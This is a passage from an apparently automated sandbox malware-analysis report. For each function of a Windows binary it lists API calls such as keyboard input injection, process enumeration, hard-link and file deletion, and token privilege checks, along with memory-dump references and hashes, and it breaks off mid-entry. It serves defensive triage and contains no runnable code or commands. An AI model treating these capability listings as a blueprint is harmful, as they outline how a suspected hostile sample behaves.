                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 46f177bbe04e1e654ea012ef484c1ae8695d84323723f740dcdb671af9500dda
                                        • Instruction ID: f319a637bf79fea15ea50289d0d3d8a757085f677c013d8ab2c8df453be8c50b
                                        • Opcode Fuzzy Hash: 46f177bbe04e1e654ea012ef484c1ae8695d84323723f740dcdb671af9500dda
                                        • Instruction Fuzzy Hash: 1041D371A00704AFD7249FB8CC41BEEBBE9EF89710F10452AF551DB283D771A9418790
                                        Function 000E56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 000E5783
                                        • GetLastError.KERNEL32(?,00000000), ref: 000E57A9
                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 000E57CE
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 000E57FA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                        • String ID:
                                        • API String ID: 3321077145-0
                                        • Opcode ID: c7b0c18ad1aecd587035997ca1a9a1d63d4fb3fe2d26166b3c81a72b32fdc1c2
                                        • Instruction ID: aee0ae89e1233cb833a2dfa550370a9ddb15f36658ca6616e1ec72509824eb72
                                        • Opcode Fuzzy Hash: c7b0c18ad1aecd587035997ca1a9a1d63d4fb3fe2d26166b3c81a72b32fdc1c2
                                        • Instruction Fuzzy Hash: C2412C39600A14DFCB11EF15C544A5DBBE2AF89725B18C888E84E6B362CB74FD41CB95
                                        Function 000AD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00096D71,00000000,00000000,000982D9,?,000982D9,?,00000001,00096D71,?,00000001,000982D9,000982D9), ref: 000AD910
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000AD999
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 000AD9AB
                                        • __freea.LIBCMT ref: 000AD9B4
                                          • Part of subcall function 000A3820: RtlAllocateHeap.NTDLL(00000000,?,00141444,?,0008FDF5,?,?,0007A976,00000010,00141440,000713FC,?,000713C6,?,00071129), ref: 000A3852
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: 82fdf08318834bc81c9b598698981023663cb356fd2d5c6130e2f5afe3d925cc
                                        • Instruction ID: 637d377c2410861dd16436333b5d7808d035143aa3d2f99d8a7fcddcb2913d65
                                        • Opcode Fuzzy Hash: 82fdf08318834bc81c9b598698981023663cb356fd2d5c6130e2f5afe3d925cc
                                        • Instruction Fuzzy Hash: C031BE72A1020AABDF259FA4DC45EEF7BA9EB42310F05426AFC05DB251EB35CD54CB90
                                        Function 001052C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00105352
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00105375
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00105382
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001053A8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LongWindow$InvalidateMessageRectSend
                                        • String ID:
                                        • API String ID: 3340791633-0
                                        • Opcode ID: 2c756bb142498daa6dbda40a8009dfd4532200faa6bb99f4f6ea9af29abcd0cf
                                        • Instruction ID: 6dce28cfe342f1ce02e54e878ff015a84bbc757bbc4093971be401afcdb02958
                                        • Opcode Fuzzy Hash: 2c756bb142498daa6dbda40a8009dfd4532200faa6bb99f4f6ea9af29abcd0cf
                                        • Instruction Fuzzy Hash: 95319E34A55A08AFEB349B14CC46BEA7767BB05390F584101FA919A2E1C7F1A980DF92
                                        Function 000DAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 000DABF1
                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 000DAC0D
                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 000DAC74
                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 000DACC6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: edc4f0b0626de8c0beb04604b702f7e8655548d4e29ae87ada74a980ff2568be
                                        • Instruction ID: 7cb452356e1ee9e2ebf19afe2d21a46357c15ec5a9ab0e88a0a38c53ca5af31b
                                        • Opcode Fuzzy Hash: edc4f0b0626de8c0beb04604b702f7e8655548d4e29ae87ada74a980ff2568be
                                        • Instruction Fuzzy Hash: A631E530B607186FEB358B6588047FE7BA5AB8A330F04531BE485523D1C37589858BB2
                                        Function 00107674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 0010769A
                                        • GetWindowRect.USER32(?,?), ref: 00107710
                                        • PtInRect.USER32(?,?,00108B89), ref: 00107720
                                        • MessageBeep.USER32(00000000), ref: 0010778C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Rect$BeepClientMessageScreenWindow
                                        • String ID:
                                        • API String ID: 1352109105-0
                                        • Opcode ID: 2101494dd0c6f4bd922ab1f24af2313b52d34ed64b41679dd5ce777f5918eab8
                                        • Instruction ID: 80db237227b203204b1fd294901a07ae752995aebf0f6189a74d38de6af6fdff
                                        • Opcode Fuzzy Hash: 2101494dd0c6f4bd922ab1f24af2313b52d34ed64b41679dd5ce777f5918eab8
                                        • Instruction Fuzzy Hash: 0241AD38A05254EFDB11CF58C898EA977F4FB49384F1581A8E8949B2E1C3B1B981CF90
                                        Function 001016DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 001016EB
                                          • Part of subcall function 000D3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 000D3A57
                                          • Part of subcall function 000D3A3D: GetCurrentThreadId.KERNEL32 ref: 000D3A5E
                                          • Part of subcall function 000D3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000D25B3), ref: 000D3A65
                                        • GetCaretPos.USER32(?), ref: 001016FF
                                        • ClientToScreen.USER32(00000000,?), ref: 0010174C
                                        • GetForegroundWindow.USER32 ref: 00101752
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                        • String ID:
                                        • API String ID: 2759813231-0
                                        • Opcode ID: c7ea62d6de0345f467e69594d613fb8a499d97b05a2ad26a3ef2b147079b9bf2
                                        • Instruction ID: 1795809185765db09cafc4be2a83f897e72747d61fc311ca9347a58999d7b264
                                        • Opcode Fuzzy Hash: c7ea62d6de0345f467e69594d613fb8a499d97b05a2ad26a3ef2b147079b9bf2
                                        • Instruction Fuzzy Hash: 71316171D00249AFD700EFA9C881CEEB7F9EF48304B50806AE459E7252D7759E45CFA1
                                        Function 000DD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 000DD501
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 000DD50F
                                        • Process32NextW.KERNEL32(00000000,?), ref: 000DD52F
                                        • CloseHandle.KERNEL32(00000000), ref: 000DD5DC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: c33150038c301e1932776f005a42bd6dd057b8b9a17fa6511f039c7e6d64f446
                                        • Instruction ID: f8f1c9d1b45a99cc0b9ce808803d3eb1276afdc2f41f38b979fd2df1ad62aa43
                                        • Opcode Fuzzy Hash: c33150038c301e1932776f005a42bd6dd057b8b9a17fa6511f039c7e6d64f446
                                        • Instruction Fuzzy Hash: 4B31C2715083019FD300EF64D881EAFBBF8EF99354F10492EF585862A2EB719945CBA3
                                        Function 00108FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00089BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00089BB2
                                        • GetCursorPos.USER32(?), ref: 00109001
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,000C7711,?,?,?,?,?), ref: 00109016
                                        • GetCursorPos.USER32(?), ref: 0010905E
                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,000C7711,?,?,?), ref: 00109094
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                        • String ID:
                                        • API String ID: 2864067406-0
                                        • Opcode ID: 19fefc4cc0d80832ab60d14199a2f59fe39cf97bbd6fefbbed07e75d088b8033
                                        • Instruction ID: 95533030cbeddb5a64d61379fb139d5b737da091c1a4b5cd8edb58ad77969230
                                        • Opcode Fuzzy Hash: 19fefc4cc0d80832ab60d14199a2f59fe39cf97bbd6fefbbed07e75d088b8033
                                        • Instruction Fuzzy Hash: 42218D35600018BFDB258F94CC68EFA7BB9FB4A350F044155F9854B2A2C3B19990DBA0
                                        Function 000DD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNEL32(?,0010CB68), ref: 000DD2FB
                                        • GetLastError.KERNEL32 ref: 000DD30A
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 000DD319
                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0010CB68), ref: 000DD376
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                        • String ID:
                                        • API String ID: 2267087916-0
                                        • Opcode ID: 89bcfbddc4b6b40f6de340f1ea126228703d4065dbe1d33eb7ae045cbcffbe5c
                                        • Instruction ID: 0d9c19e48cb33443984d270ca9a66d32fff8623b7cc6bdeb592cafb60ab8cbc1
                                        • Opcode Fuzzy Hash: 89bcfbddc4b6b40f6de340f1ea126228703d4065dbe1d33eb7ae045cbcffbe5c
                                        • Instruction Fuzzy Hash: 15215C705093019FC710DF28C8818AE77E4AF5A364F504A1BF499C73A2DB719A45CFA7
                                        Function 000D1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000D1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000D102A
                                          • Part of subcall function 000D1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000D1036
                                          • Part of subcall function 000D1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000D1045
                                          • Part of subcall function 000D1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000D104C
                                          • Part of subcall function 000D1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000D1062
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 000D15BE
                                        • _memcmp.LIBVCRUNTIME ref: 000D15E1
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D1617
                                        • HeapFree.KERNEL32(00000000), ref: 000D161E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                        • String ID:
                                        • API String ID: 1592001646-0
                                        • Opcode ID: 36731ce34bd12433cef9bc0840a1e79dab8290bfb8d056e07c78676a1c95e7f7
                                        • Instruction ID: dab42da1405628c43027f1bf9f3d948eadde660d7f7f79cc4098b3402533da7e
                                        • Opcode Fuzzy Hash: 36731ce34bd12433cef9bc0840a1e79dab8290bfb8d056e07c78676a1c95e7f7
                                        • Instruction Fuzzy Hash: 29216971E00209FFDB00DFA4C949BEEB7F8EF44344F08855AE441AB241EB74AA45CBA0
                                        Function 00102782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 0010280A
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00102824
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00102832
                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00102840
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$Long$AttributesLayered
                                        • String ID:
                                        • API String ID: 2169480361-0
                                        • Opcode ID: dc2bbbabace07d63815f8262e2f2584d9e956b1c538cac4503c4cc8d6417821d
                                        • Instruction ID: 7c761d882b4efafec11c23f781f57d48585ab4d5876534c84d957fe5da929822
                                        • Opcode Fuzzy Hash: dc2bbbabace07d63815f8262e2f2584d9e956b1c538cac4503c4cc8d6417821d
                                        • Instruction Fuzzy Hash: 66210635704510AFD7149B24CC48FAA7795AF46324F148259F4568B6D2CBB5FC82CBD0
                                        Function 000D78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000D8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,000D790A,?,000000FF,?,000D8754,00000000,?,0000001C,?,?), ref: 000D8D8C
                                          • Part of subcall function 000D8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 000D8DB2
                                          • Part of subcall function 000D8D7D: lstrcmpiW.KERNEL32(00000000,?,000D790A,?,000000FF,?,000D8754,00000000,?,0000001C,?,?), ref: 000D8DE3
                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,000D8754,00000000,?,0000001C,?,?,00000000), ref: 000D7923
                                        • lstrcpyW.KERNEL32(00000000,?), ref: 000D7949
                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,000D8754,00000000,?,0000001C,?,?,00000000), ref: 000D7984
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpylstrlen
                                        • String ID: cdecl
                                        • API String ID: 4031866154-3896280584
                                        • Opcode ID: 96bcaa64776fe9e8adb5bdb9f52510b01d3da6374a42a7df7ad515f09e134c1a
                                        • Instruction ID: 2fb386c7080d6ba244c161ffcf6bca5888ba0ef4535de336b7a288e6c792e93b
                                        • Opcode Fuzzy Hash: 96bcaa64776fe9e8adb5bdb9f52510b01d3da6374a42a7df7ad515f09e134c1a
                                        • Instruction Fuzzy Hash: F911B43A200302ABCB155F34D855D7AB7E5FF85350B50802BF946C73A5FB719851CBA1
                                        Function 00107CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00107D0B
                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00107D2A
                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00107D42
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,000EB7AD,00000000), ref: 00107D6B
                                          • Part of subcall function 00089BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00089BB2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID:
                                        • API String ID: 847901565-0
                                        • Opcode ID: a4a66a86eaafb8de0a2f26e0519dca8f5a63dbeab9befc5d70e1c94eb10dcfaf
                                        • Instruction ID: d30610210168844775274c3b2b1539c923073e43d80ee7ce3339ceb24b4a0e41
                                        • Opcode Fuzzy Hash: a4a66a86eaafb8de0a2f26e0519dca8f5a63dbeab9befc5d70e1c94eb10dcfaf
                                        • Instruction Fuzzy Hash: 8211E135A05655AFCB109F68CC04AB63BA4BF46360B258728F879C72F0E770ED90CB90
                                        Function 00105660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 001056BB
                                        • _wcslen.LIBCMT ref: 001056CD
                                        • _wcslen.LIBCMT ref: 001056D8
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00105816
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend_wcslen
                                        • String ID:
                                        • API String ID: 455545452-0
                                        • Opcode ID: c600eed84b882feb1722e6ba8e32e5cd1b8d9a66bf809dcf11dc6e0822e97073
                                        • Instruction ID: 4e1bb3ca1d91b5cf59e495cf68a2da5a2dd83ed5701cce8441beb91497af590e
                                        • Opcode Fuzzy Hash: c600eed84b882feb1722e6ba8e32e5cd1b8d9a66bf809dcf11dc6e0822e97073
                                        • Instruction Fuzzy Hash: 7211B175A00608A6DF209F61CC85AEF7BBCEF11764B104126F995D60C1EBF08A81CF60
                                        Function 000A1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6f15094e212e5df4f32ed88c2f16961d83fba2a1e5eaf287b478b2f68493b693
                                        • Instruction ID: 2385014646d5597598195587a99769f78421278949d86540f70cd80c5400c113
